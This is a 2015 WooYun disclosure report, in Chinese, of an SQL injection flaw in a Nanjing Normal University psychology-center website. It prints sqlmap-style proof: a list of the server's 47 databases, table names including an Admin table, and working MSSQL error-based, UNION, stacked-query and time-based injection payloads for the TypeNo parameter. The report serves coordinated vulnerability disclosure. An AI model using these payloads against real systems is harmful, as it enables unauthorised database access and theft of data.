当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136135

漏洞标题:南京师范大学某站存在一处SQL注入漏洞

相关厂商:CCERT教育网应急响应组

漏洞作者: Hex

提交时间:2015-08-23 20:12

修复时间:2015-10-08 08:24

公开时间:2015-10-08 08:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

南京师范大学某站存在一处SQL注入漏洞

详细说明:

1# 漏洞存在于心理学实验教学中心网站中

http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7


其中的TypeNo和teaNo参数均存在注入

error.png


2# 47个库

current user:    'xinli'
current database: 'NSXinLiXue'
current user is DBA: False
available databases [47]:
[*] BZBB_lw
[*] ChuangXinNS
[*] db_dike
[*] db_dndqjzw
[*] db_njsdjw
[*] db_njsfsy
[*] db_nsddlhj
[*] db_nsdhgxn
[*] db_nsdmba
[*] db_nsdMediaC
[*] db_nsdscw
[*] db_nsdsw
[*] db_nsdswyy
[*] db_nsdswzy
[*] db_nyspjc
[*] db_sdjxjy
[*] db_spaqjc
[*] JiaoCai
[*] master
[*] MBA
[*] model
[*] msdb
[*] njnulab
[*] njnupj
[*] nju
[*] nju2222
[*] njuold
[*] njupj2012
[*] Northwind
[*] NSD_ApplicationChemical
[*] NSD_Cnooc
[*] NSD_ElectricalEngineering
[*] NSD_ElectronicInformation
[*] NSD_TeacherSkills
[*] NSD_TeachingTeam
[*] nsddky_sy
[*] nsdsfjdzx
[*] nsdsfjdzxnew
[*] nsglxt
[*] NSHuaKe
[*] NSXinLiXue
[*] NY_JG
[*] pubs
[*] ShangXueYuannew
[*] tempdb
[*] zhongxin
[*] zhongxinold


3# zhongxin库中的表

Database: zhongxin
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.tongji | 1853 |
| dbo.dike_sqb | 1480 |
| dbo.chuanmei_News | 869 |
| dbo.news | 404 |
| dbo.faxue_News | 279 |
| dbo.meishu_News | 169 |
| dbo.dianqi_News | 135 |
| dbo.sw_News | 101 |
| dbo.jinnv_News | 95 |
| dbo.sw_links | 88 |
| dbo.dianqi_szdw | 82 |
| dbo.chuanmei_SmallClass | 71 |
| dbo.classurl | 69 |
| dbo.xinli_News | 69 |
| dbo.dike_szdw | 60 |
| dbo.dike_News | 55 |
| dbo.jiaoyu_News | 48 |
| dbo.meishu_SmallClass | 44 |
| dbo.faxue_down | 43 |
| dbo.huaxue_News | 43 |
| dbo.huaxue_SmallClass | 43 |
| dbo.meishu_szdw | 33 |
| dbo.dike_SmallClass | 30 |
| dbo.sw_down | 21 |
| dbo.meishu_sqb | 20 |
| dbo.dike_szdwzdy | 19 |
| dbo.dianqi_down | 18 |
| dbo.meishu_down | 18 |
| dbo.dike_down | 17 |
| dbo.faxue_SmallClass | 16 |
| dbo.huaxue_szdw | 15 |
| dbo.jinnv_down | 15 |
| dbo.xinli_down | 15 |
| dbo.chuanmei_BigClass | 13 |
| dbo.dike_BigClass | 13 |
| dbo.faxue_szdw | 13 |
| dbo.huaxue_BigClass | 13 |
| dbo.sw_SmallClass | 13 |
| dbo.sysconstraints | 13 |
| dbo.faxue_BigClass | 12 |
| dbo.jinnv_szdw | 12 |
| dbo.sw_szdw | 12 |
| dbo.faxue_sqb | 11 |
| dbo.chaunmei_sqb | 10 |
| dbo.chuanmei_down | 10 |
| dbo.dianqi_BigClass | 10 |
| dbo.dianqi_sqb | 10 |
| dbo.jiaoyu_down | 10 |
| dbo.jiaoyu_SmallClass | 10 |
| dbo.jinnv_sqb | 10 |
| dbo.sw_sqb | 10 |
| dbo.xinli_BigClass | 10 |
| dbo.xinli_sqb | 10 |
| dbo.chuanmei_links | 9 |
| dbo.jiaoyu_BigClass | 9 |
| dbo.jinnv_BigClass | 9 |
| dbo.jinnv_SmallClass | 9 |
| dbo.meishu_BigClass | 9 |
| dbo.sw_BigClass | 9 |
| dbo.xinli_SmallClass | 9 |
| dbo.jinnv_links | 8 |
| dbo.dianqi_SmallClass | 6 |
| dbo.link | 6 |
| dbo.Admin | 5 |
| dbo.huaxue_down | 5 |
| dbo.dianqi_links | 4 |
| dbo.dike_gg | 4 |
| dbo.meishu_gg | 4 |
| dbo.sw_gg | 4 |
| dbo.chuanmei_szdw | 3 |
| dbo.syssegments | 3 |
| dbo.xinli_Vote | 3 |
| dbo.chuanmei_gg | 2 |
| dbo.dianqi_gg | 2 |
| dbo.faxue_links | 2 |
| dbo.jiaoyu_gg | 2 |
| dbo.jinnv_gg | 2 |
| dbo.xinli_gg | 2 |
| dbo.faxue_gg | 1 |
| dbo.jiaoyu_szdw | 1 |
| dbo.xinli_links | 1 |
| dbo.xinli_szdw | 1 |
+-------------------------+---------+


4# 库太多了,就不一一看了

漏洞证明:

Place: GET
Parameter: TypeNo
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TypeNo=47' AND 6611=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6611=6611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58))) AND 'Kchf'='Kchf&teaNo=7
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: TypeNo=47' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+CHAR(98)+CHAR(82)+CHAR(73)+CHAR(99)+CHAR(102)+CHAR(88)+CHAR(117)+CHAR(86)+CHAR(104)+CHAR(87)+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58)-- &teaNo=7
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TypeNo=47'; WAITFOR DELAY '0:0:5'--&teaNo=7
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TypeNo=47' WAITFOR DELAY '0:0:5'--&teaNo=7

修复方案:

别处应该也存在注入点,建议全站检查下

版权声明:转载请注明来源 Hex@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-08-24 08:22

厂商回复:

通知用户处理中

最新状态:

暂无


漏洞评价:

评论